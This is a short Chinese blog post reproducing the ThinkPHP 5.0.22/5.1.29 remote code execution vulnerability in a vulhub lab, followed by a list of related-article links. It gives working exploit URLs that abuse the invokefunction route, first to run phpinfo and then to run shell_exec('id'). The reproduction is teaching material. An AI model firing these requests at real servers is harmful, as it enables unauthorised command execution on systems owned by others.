vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

1.环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

2.直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

http://192.168.188.139:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
相关推荐
dot.Net安全矩阵1 小时前
.NET内网实战:通过命令行解密Web.config
前端·学习·安全·web安全·矩阵·.net
sec0nd_2 小时前
1网络安全的基本概念
网络·安全·web安全
网安CILLE2 小时前
2024年某大厂HW蓝队面试题分享
网络·安全·web安全
SUGERBOOM2 小时前
【网络安全】网络基础第一阶段——第一节:网络协议基础---- OSI与TCP/IP协议
网络·网络协议·web安全
qmx_076 小时前
HTB-Jerry(tomcat war文件、msfvenom)
java·web安全·网络安全·tomcat
Wrop15 小时前
网络安全实训八(y0usef靶机渗透实例)
安全·web安全
xuan哈哈哈21 小时前
web基础—dvwa靶场(八)SQL Injection(Blind)
数据库·web安全·网络安全